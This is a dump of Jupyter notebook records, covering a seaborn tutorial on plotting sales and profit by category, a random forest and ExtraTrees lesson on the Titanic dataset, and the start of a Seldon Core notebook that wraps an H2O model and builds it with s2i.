"_____no_output_____"
]
],
[
[
"df = df[(df.Profit<1000) & (df.Profit>-1000)]\n\n# boxplot of a variable across various product categories\nsns.boxplot(x='Product_Category', y='Profit', data=df)\nplt.show()",
"_____no_output_____"
]
],
[
[
"You can see that though the category 'Technology' has better sales numbers than others, it is also the one where the **most loss making transactions** happen. You can drill further down into this.\n\n",
"_____no_output_____"
]
],
[
[
"# adjust figure size\nplt.figure(figsize=(10, 8))\n\n# subplot 1: Sales\nplt.subplot(1, 2, 1)\nsns.boxplot(x='Product_Category', y='Sales', data=df)\nplt.title(\"Sales\")\nplt.yscale('log')\n\n# subplot 2: Profit\nplt.subplot(1, 2, 2)\nsns.boxplot(x='Product_Category', y='Profit', data=df)\nplt.title(\"Profit\")\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"Now that we've compared Sales and Profits across product categories, let's drill down further and do the same across **another categorical variable** - Customer_Segment. \n\nWe'll need to add the customer-related attributes (dimensions) to this dataframe.",
"_____no_output_____"
]
],
[
[
"# merging with customers df\ndf = pd.merge(df, customer_df, how='inner', on='Cust_id')\ndf.head()",
"_____no_output_____"
],
[
"# boxplot of a variable across various product categories\nsns.boxplot(x='Customer_Segment', y='Profit', data=df)\nplt.show()",
"_____no_output_____"
]
],
[
[
"You can **visualise the distribution across two categorical variables** using the ```hue= ``` argument.",
"_____no_output_____"
]
],
[
[
"# set figure size for larger figure\nplt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')\n\n# specify hue=\"categorical_variable\"\nsns.boxplot(x='Customer_Segment', y='Profit', hue=\"Product_Category\", data=df)\nplt.show()",
"_____no_output_____"
]
],
[
[
"Across all customer segments, the product category ```Technology``` seems to be doing fairly well, though ```Furniture``` is incurring losses across all segments. \n\nNow say you are curious to know why certain orders are making huge losses. One of your hypotheses is that the *shipping cost is too high in some orders*. You can **plot derived variables** as well, such as *shipping cost as percentage of sales amount*. ",
"_____no_output_____"
]
],
[
[
"# plot shipping cost as percentage of Sales amount\nsns.boxplot(x=df['Product_Category'], y=100*df['Shipping_Cost']/df['Sales'])\nplt.ylabel(\"100*(Shipping cost/Sales)\")\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Plotting Aggregated Values across Categories\n\n\n### Bar Plots - Mean, Median and Count Plots\n\n\nBar plots are used to **display aggregated values** of a variable, rather than entire distributions. This is especially useful when you have a lot of data which is difficult to visualise in a single figure. \n\nFor example, say you want to visualise and *compare the average Sales across Product Categories*. The ```sns.barplot()``` function can be used to do that.\n",
"_____no_output_____"
]
],
[
[
"# bar plot with default statistic=mean\nsns.barplot(x='Product_Category', y='Sales', data=df)\nplt.show()",
"c:\\users\\brsingh\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\scipy\\stats\\stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
]
],
[
[
"Note that, **by default, seaborn plots the mean value across categories**, though you can plot the count, median, sum etc. Also, barplot computes and shows the confidence interval of the mean as well.",
"_____no_output_____"
]
],
[
[
"# Create 2 subplots for mean and median respectively\n\n# increase figure size \nplt.figure(figsize=(12, 6))\n\n# subplot 1: statistic=mean\nplt.subplot(1, 2, 1)\nsns.barplot(x='Product_Category', y='Sales', data=df)\nplt.title(\"Average Sales\")\n\n# subplot 2: statistic=median\nplt.subplot(1, 2, 2)\nsns.barplot(x='Product_Category', y='Sales', data=df, estimator=np.median)\nplt.title(\"Median Sales\")\n\nplt.show()\n",
"c:\\users\\brsingh\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\scipy\\stats\\stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
]
],
[
[
"Look at that! The mean and median sales across the product categories tell different stories. This is because of some outliers (extreme values) in the ```Furniture``` category, distorting the value of the mean.\n\n\nYou can add another categorical variable in the plot.",
"_____no_output_____"
]
],
[
[
"# set figure size for larger figure\nplt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')\n\n# specify hue=\"categorical_variable\"\nsns.barplot(x='Customer_Segment', y='Profit', hue=\"Product_Category\", data=df, estimator=np.median)\nplt.show()",
"c:\\users\\brsingh\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\scipy\\stats\\stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
]
],
[
[
"The plot neatly shows the median profit across product categories and customer segments. It says that:\n- On average, only Technology products in the Small Business and Corporate customer segments are profitable.\n- Furniture is incurring losses across all Customer Segments\n\n\nCompare this to the boxplot we had created above - though the bar plot contains less information than the boxplot, it is more revealing.\n\n<hr>",
"_____no_output_____"
],
[
"When you have a large number of categories to visualise, it is helpful to plot them along the y-axis. Let's now *drill down into product sub categories*. ",
"_____no_output_____"
]
],
[
[
"# Plotting categorical variable across the y-axis\nplt.figure(figsize=(10, 8))\nsns.barplot(x='Profit', y=\"Product_Sub_Category\", data=df, estimator=np.median)\nplt.show()",
"c:\\users\\brsingh\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\scipy\\stats\\stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
]
],
[
[
"The plot clearly shows which sub categories are incurring the heaviest losses - Copiers and Fax, Tables, Chairs and Chairmats are the most loss making categories. \n\n\nYou can also plot the **count of the observations** across categorical variables using ```sns.countplot()```.",
"_____no_output_____"
]
],
[
[
"# Plotting count across a categorical variable \nplt.figure(figsize=(10, 8))\nsns.countplot(y=\"Product_Sub_Category\", data=df)\nplt.show()",
"_____no_output_____"
]
],
[
[
"Note that the most loss-making category - Copiers and Fax - has very few orders. \n\n\nIn the next section, we will see how to plot Time Series data.",
"_____no_output_____"
],
[
"## Additional Stuff on Plotting Categorical Variables\n\n1. <a href=\"https://seaborn.pydata.org/tutorial/categorical.html\">Seaborn official tutorial on categorical variables</a>",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
]
] |
cb508055f78260ef54522469444a014363b0d2d0 | 30,715 | ipynb | Jupyter Notebook | Notebook/Lesson-random-forests/solution-code/solution-code.ipynb | sgdataguru/ITE_Machine_Learning_Workshop | 257e5c1e80341137fcb0d6f291d89dad6d551c01 | [
"Apache-2.0"
] | null | null | null | Notebook/Lesson-random-forests/solution-code/solution-code.ipynb | sgdataguru/ITE_Machine_Learning_Workshop | 257e5c1e80341137fcb0d6f291d89dad6d551c01 | [
"Apache-2.0"
] | null | null | null | Notebook/Lesson-random-forests/solution-code/solution-code.ipynb | sgdataguru/ITE_Machine_Learning_Workshop | 257e5c1e80341137fcb0d6f291d89dad6d551c01 | [
"Apache-2.0"
] | null | null | null | 28.598696 | 630 | 0.432134 | [
[
[
"\n<img src=\"https://maltem.com/wp-content/uploads/2020/04/LOGO_MALTEM.png\" style=\"float: left; margin: 20px; height: 55px\">\n\n<br>\n<br>\n<br>\n<br>\n\n\n# Random Forests and ExtraTrees\n\n\n_Authors: Matt Brems (DC), Riley Dallas (AUS)_\n\n---",
"_____no_output_____"
],
[
"## Random Forests\n---\n\nWith bagged decision trees, we generate many different trees on pretty similar data. These trees are **strongly correlated** with one another. Because these trees are correlated with one another, they will have high variance. Looking at the variance of the average of two random variables $T_1$ and $T_2$:\n\n$$\n\\begin{eqnarray*}\nVar\\left(\\frac{T_1+T_2}{2}\\right) &=& \\frac{1}{4}\\left[Var(T_1) + Var(T_2) + 2Cov(T_1,T_2)\\right]\n\\end{eqnarray*}\n$$\n\nIf $T_1$ and $T_2$ are highly correlated, then the variance will about as high as we'd see with individual decision trees. By \"de-correlating\" our trees from one another, we can drastically reduce the variance of our model.\n\nThat's the difference between bagged decision trees and random forests! We're going to do the same thing as before, but we're going to de-correlate our trees. This will reduce our variance (at the expense of a small increase in bias) and thus should greatly improve the overall performance of the final model.\n\nSo how do we \"de-correlate\" our trees?\n\nRandom forests differ from bagging decision trees in only one way: they use a modified tree learning algorithm that selects, at each split in the learning process, a **random subset of the features**. This process is sometimes called the *random subspace method*.\n\nThe reason for doing this is the correlation of the trees in an ordinary bootstrap sample: if one or a few features are very strong predictors for the response variable (target output), these features will be used in many/all of the bagged decision trees, causing them to become correlated. By selecting a random subset of features at each split, we counter this correlation between base trees, strengthening the overall model.\n\nFor a problem with $p$ features, it is typical to use:\n\n- $\\sqrt{p}$ (rounded down) features in each split for a classification problem.\n- $p/3$ (rounded down) with a minimum node size of 5 as the default for a regression problem.\n\nWhile this is a guideline, Hastie and Tibshirani (authors of Introduction to Statistical Learning and Elements of Statistical Learning) have suggested this as a good rule in the absence of some rationale to do something different.\n\nRandom forests, a step beyond bagged decision trees, are **very widely used** classifiers and regressors. They are relatively simple to use because they require very few parameters to set and they perform pretty well.\n- It is quite common for interviewers to ask how a random forest is constructed or how it is superior to a single decision tree.\n\n--- \n\n## Extremely Randomized Trees (ExtraTrees)\nAdding another step of randomization (and thus de-correlation) yields extremely randomized trees, or _ExtraTrees_. Like Random Forests, these are trained using the random subspace method (sampling of features). However, they are trained on the entire dataset instead of bootstrapped samples. A layer of randomness is introduced in the way the nodes are split. Instead of computing the locally optimal feature/split combination (based on, e.g., information gain or the Gini impurity) for each feature under consideration, a random value is selected for the split. This value is selected from the feature's empirical range.\n\nThis further reduces the variance, but causes an increase in bias. If you're considering using ExtraTrees, you might consider this to be a hyperparameter you can tune. 
Build an ExtraTrees model and a Random Forest model, then compare their performance!\n\nThat's exactly what we'll do below.",
"_____no_output_____"
],
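[
"**Added illustration (not part of the original lesson).** The random-subspace idea described above corresponds to the `max_features` argument in scikit-learn; `'sqrt'` is the usual choice for classification problems. A minimal sketch:\n\n```python\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier\n\n# each split will consider a random subset of sqrt(p) features\nrf_demo = RandomForestClassifier(n_estimators=100, max_features='sqrt')\net_demo = ExtraTreesClassifier(n_estimators=100, max_features='sqrt')\n```",
"_____no_output_____"
],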
[
"## Import libraries\n---\n\nWe'll need the following libraries for today's lecture:\n- `pandas`\n- `numpy`\n- `GridSearchCV`, `train_test_split` and `cross_val_score` from `sklearn`'s `model_selection` module \n- `RandomForestClassifier` and `ExtraTreesClassifier` from `sklearn`'s `ensemble` module ",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier\nfrom sklearn.model_selection import cross_val_score, train_test_split, GridSearchCV",
"_____no_output_____"
]
],
[
[
"## Load Data\n---\n\nLoad `train.csv` and `test.csv` from Kaggle into `DataFrames`.",
"_____no_output_____"
]
],
[
[
"train = pd.read_csv('../datasets/train.csv')",
"_____no_output_____"
],
[
"test = pd.read_csv('../datasets/test.csv')",
"_____no_output_____"
],
[
"train.head()",
"_____no_output_____"
],
[
"train.shape",
"_____no_output_____"
]
],
[
[
"## Data Cleaning: Drop the two rows with missing `Embarked` values from train\n---",
"_____no_output_____"
]
],
[
[
"train = train[train['Embarked'].notnull()]",
"_____no_output_____"
],
[
"train.shape",
"_____no_output_____"
],
[
"train[train['Pclass'] == 3]",
"_____no_output_____"
]
],
[
[
"## Data Cleaning: `Fare`\n---\n\nThe test set has one row with a missing value for `Fare`. Fill it with the average `Fare` of passengers from the same `Pclass`. **Use the training set to calculate the average!**",
"_____no_output_____"
]
],
[
[
"mean_fare_3 = train[train['Pclass'] == 3]['Fare'].mean()\nmean_fare_3",
"_____no_output_____"
],
[
"test['Fare'] = test['Fare'].fillna(mean_fare_3)",
"_____no_output_____"
],
[
"test.isnull().sum()",
"_____no_output_____"
]
],
[
[
"## Data Cleaning: `Age`\n---\n\nLet's simply impute all missing ages to be **999**. \n\n**NOTE**: This is not a best practice. However, \n1. Since we haven't really covered imputation in depth\n2. And the proper way would take too long to implement (thus detracting) from today's lecture\n3. And since we're ensembling with Decision Trees\n\nWe'll do it this way as a matter of convenience.",
"_____no_output_____"
]
],
[
[
"train['Age'] = train['Age'].fillna(999)",
"_____no_output_____"
],
[
"test['Age'] = test['Age'].fillna(999)",
"_____no_output_____"
]
],
[
[
"## Feature Engineering: `Cabin`\n---\n\nSince there are so many missing values for `Cabin`, let's binarize that column as follows:\n- 1 if there originally was a value for `Cabin`\n- 0 if it was null\n\n**Do this for both `train` and `test`**",
"_____no_output_____"
]
],
[
[
"train['Cabin'] = train['Cabin'].notnull().astype(int)",
"_____no_output_____"
],
[
"test['Cabin'] = test['Cabin'].notnull().astype(int)",
"_____no_output_____"
]
],
[
[
"## Feature Engineering: Dummies\n---\n\nDummy the `Sex` and `Embarked` columns. Be sure to set `drop_first=True`.",
"_____no_output_____"
]
],
[
[
"train = pd.get_dummies(train, columns=['Sex', 'Embarked'], drop_first=True)",
"_____no_output_____"
],
[
"test = pd.get_dummies(test, columns=['Sex', 'Embarked'], drop_first=True)",
"_____no_output_____"
]
],
[
[
"## Model Prep: Create `X` and `y` variables\n---\n\nOur features will be:\n- `Pclass`\n- `Age`\n- `SibSp`\n- `Parch`\n- `Fare`\n- `Cabin`\n- `Sex_male`\n- `Embarked_Q`\n- `Embarked_S`\n\nAnd our target will be `Survived`",
"_____no_output_____"
]
],
[
[
"features = ['Pclass', 'Age', 'SibSp', 'Parch', 'Fare', 'Cabin', 'Sex_male', 'Embarked_Q', 'Embarked_S']\nX = train[features]\ny = train['Survived']",
"_____no_output_____"
]
],
[
[
"## Challenge: What is our baseline accuracy?\n---\n\nThe baseline accuracy is the percentage of the majority class, regardless of whether it is 1 or 0. It serves as the benchmark for our model to beat.",
"_____no_output_____"
]
],
[
[
"y.value_counts(normalize=True)",
"_____no_output_____"
]
],
[
[
"## Train/Test Split\n---\n\nI know it can be confusing having an `X_test` from our training data vs a test set from Kaggle. If you want, you can use `X_val`/`y_val` for what we normally call `X_test`/`y_test`.",
"_____no_output_____"
]
],
[
[
"X_train, X_val, y_train, y_val = train_test_split(X, y, random_state=42, stratify=y)",
"_____no_output_____"
]
],
[
[
"## Model instantiation\n---\n\nCreate an instance of `RandomForestClassifier` and `ExtraTreesClassifier`.",
"_____no_output_____"
]
],
[
[
"rf = RandomForestClassifier(n_estimators=100)",
"_____no_output_____"
],
[
"et = ExtraTreesClassifier(n_estimators=100)",
"_____no_output_____"
]
],
[
[
"## Model Evaluation\n---\n\nWhich one has a higher `cross_val_score`?",
"_____no_output_____"
]
],
[
[
"cross_val_score(rf, X_train, y_train, cv=5).mean()",
"_____no_output_____"
],
[
"cross_val_score(et, X_train, y_train, cv=5).mean()",
"_____no_output_____"
]
],
[
[
"## Grid Search\n---\n\nThey're both pretty close performance-wise. We could Grid Search over both, but for the sake of time we'll go with `RandomForestClassifier`.",
"_____no_output_____"
]
],
[
[
"rf_params = {\n 'n_estimators': [100, 150, 200],\n 'max_depth': [None, 1, 2, 3, 4, 5],\n}\ngs = GridSearchCV(rf, param_grid=rf_params, cv=5)\ngs.fit(X_train, y_train)\nprint(gs.best_score_)\ngs.best_params_",
"0.8198630905622265\n"
],
[
"gs.score(X_train, y_train)",
"_____no_output_____"
],
[
"gs.score(X_val, y_val)",
"_____no_output_____"
]
],
[
[
"## Kaggle Submission\n---\n\nNow that we've evaluated our model, let's submit our predictions to Kaggle.",
"_____no_output_____"
]
],
[
[
"pred = gs.predict(test[features])",
"_____no_output_____"
],
[
"test['Survived'] = pred",
"_____no_output_____"
],
[
"# index=False keeps the file to the two columns Kaggle expects (no index column)\ntest[['PassengerId', 'Survived']].to_csv('submission.csv', index=False)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb50a13a281a245cbdcbb8a7e5203d2a0fa162d8 | 12,803 | ipynb | Jupyter Notebook | Tutorials/MarkingTests.ipynb | mbaas2/APLcourse | 3acdbef4a1f7c06be049e8677b71ce8536815a72 | [
"MIT"
] | null | null | null | Tutorials/MarkingTests.ipynb | mbaas2/APLcourse | 3acdbef4a1f7c06be049e8677b71ce8536815a72 | [
"MIT"
] | null | null | null | Tutorials/MarkingTests.ipynb | mbaas2/APLcourse | 3acdbef4a1f7c06be049e8677b71ce8536815a72 | [
"MIT"
] | null | null | null | 25.708835 | 447 | 0.510037 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb50a998deef031766a641258109509f026cb13f | 779,348 | ipynb | Jupyter Notebook | examples/models/h2o_mojo/h2o_model.ipynb | lennon310/seldon-core | 7a539b656506943859d0e684a076903a84097dba | [
"Apache-2.0"
] | null | null | null | examples/models/h2o_mojo/h2o_model.ipynb | lennon310/seldon-core | 7a539b656506943859d0e684a076903a84097dba | [
"Apache-2.0"
] | null | null | null | examples/models/h2o_mojo/h2o_model.ipynb | lennon310/seldon-core | 7a539b656506943859d0e684a076903a84097dba | [
"Apache-2.0"
] | null | null | null | 100.821216 | 286 | 0.661341 | [
[
[
"# H2O Model\n\n * Wrap a H2O model for use as a prediction microservice in seldon-core\n * Run locally on Docker to test\n * Deploy on seldon-core running on minikube\n \n## Dependencies\n\n * [Helm](https://github.com/kubernetes/helm)\n * [Minikube](https://github.com/kubernetes/minikube)\n * [S2I](https://github.com/openshift/source-to-image)\n * [H2O](https://www.h2o.ai/download/)\n\n```bash\npip install seldon-core\npip install sklearn\n```\n\n## Train locally\n ",
"_____no_output_____"
]
],
[
[
"!mkdir -p experiment",
"_____no_output_____"
],
[
"import h2o\nh2o.init()\nfrom h2o.estimators.glm import H2OGeneralizedLinearEstimator\npath = \"http://s3.amazonaws.com/h2o-public-test-data/smalldata/prostate/prostate.csv.zip\"\nh2o_df = h2o.import_file(path)\nh2o_df['CAPSULE'] = h2o_df['CAPSULE'].asfactor()\nmodel = H2OGeneralizedLinearEstimator(family = \"binomial\")\nmodel.train(y = \"CAPSULE\",\n x = [\"AGE\", \"RACE\", \"PSA\", \"GLEASON\"],\n training_frame = h2o_df)\nmodelfile = model.download_mojo(path=\"./experiment/\", get_genmodel_jar=False)\nprint(\"Model saved to \" + modelfile)\n",
"[WARNING] H2O requires colorama module of version 0.3.8 or newer. You have version 0.3.7.\nYou can upgrade to the newest version of the module running from the command line\n $ pip3 install --upgrade colorama\nChecking whether there is an H2O instance running at http://localhost:54321..... not found.\nAttempting to start a local H2O server...\n Java Version: openjdk version \"1.8.0_191\"; OpenJDK Runtime Environment (build 1.8.0_191-8u191-b12-2ubuntu0.16.04.1-b12); OpenJDK 64-Bit Server VM (build 25.191-b12, mixed mode)\n Starting server from /home/clive/anaconda3/lib/python3.6/site-packages/h2o/backend/bin/h2o.jar\n Ice root: /tmp/tmpxq550zci\n JVM stdout: /tmp/tmpxq550zci/h2o_clive_started_from_python.out\n JVM stderr: /tmp/tmpxq550zci/h2o_clive_started_from_python.err\n Server is running at http://127.0.0.1:54321\nConnecting to H2O server at http://127.0.0.1:54321... successful.\nWarning: Your H2O cluster version is too old (1 year and 18 days)! Please download and install the latest version from http://h2o.ai/download/\n"
],
[
"!mv experiment/*.zip src/main/resources/model.zip",
"_____no_output_____"
]
],
[
[
"Wrap model using s2i",
"_____no_output_____"
]
],
[
[
"!s2i build . seldonio/seldon-core-s2i-java-build:0.1 h2o-test:0.1 --runtime-image seldonio/seldon-core-s2i-java-runtime:0.1",
"---> Installing application source...\n[INFO] Scanning for projects...\nDownloading: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-parent/1.5.1.RELEASE/spring-boot-starter-parent-1.5.1.RELEASE.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-parent/1.5.1.RELEASE/spring-boot-starter-parent-1.5.1.RELEASE.pom (8 KB at 5.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-dependencies/1.5.1.RELEASE/spring-boot-dependencies-1.5.1.RELEASE.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-dependencies/1.5.1.RELEASE/spring-boot-dependencies-1.5.1.RELEASE.pom (88 KB at 363.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/kr/motd/maven/os-maven-plugin/1.4.1.Final/os-maven-plugin-1.4.1.Final.pom\nDownloaded: https://repo.maven.apache.org/maven2/kr/motd/maven/os-maven-plugin/1.4.1.Final/os-maven-plugin-1.4.1.Final.pom (7 KB at 112.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom (7 KB at 106.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.2.1/maven-plugin-api-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.2.1/maven-plugin-api-3.2.1.pom (4 KB at 62.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.2.1/maven-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.2.1/maven-3.2.1.pom (23 KB at 210.1 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom (32 KB at 256.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom (14 KB at 162.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.2.1/maven-model-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.2.1/maven-model-3.2.1.pom (5 KB at 82.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom (4 KB at 62.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom (20 KB at 214.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom (7 KB at 126.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom (14 KB at 167.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.2.1/maven-artifact-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.2.1/maven-artifact-3.2.1.pom (2 
KB at 35.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.pom (5 KB at 87.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M5/sisu-plexus-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M5/sisu-plexus-0.0.0.M5.pom (13 KB at 165.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom (5 KB at 88.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.pom (2 KB at 26.4 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-parent/1.0/weld-api-parent-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-parent/1.0/weld-api-parent-1.0.pom (3 KB at 42.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-bom/1.0/weld-api-bom-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-bom/1.0/weld-api-bom-1.0.pom (8 KB at 145.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-parent/6/weld-parent-6.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-parent/6/weld-parent-6.pom (21 KB at 255.8 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.pom (1023 B at 18.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom (612 B at 11.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.pom (6 KB at 99.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/10.0.1/guava-parent-10.0.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/10.0.1/guava-parent-10.0.1.pom (2 KB at 36.1 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.pom (965 B at 19.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0.pom (10 KB at 183.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-parent/3.1.0/guice-parent-3.1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-parent/3.1.0/guice-parent-3.1.0.pom (11 KB at 205.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.pom (363 B at 5.9 
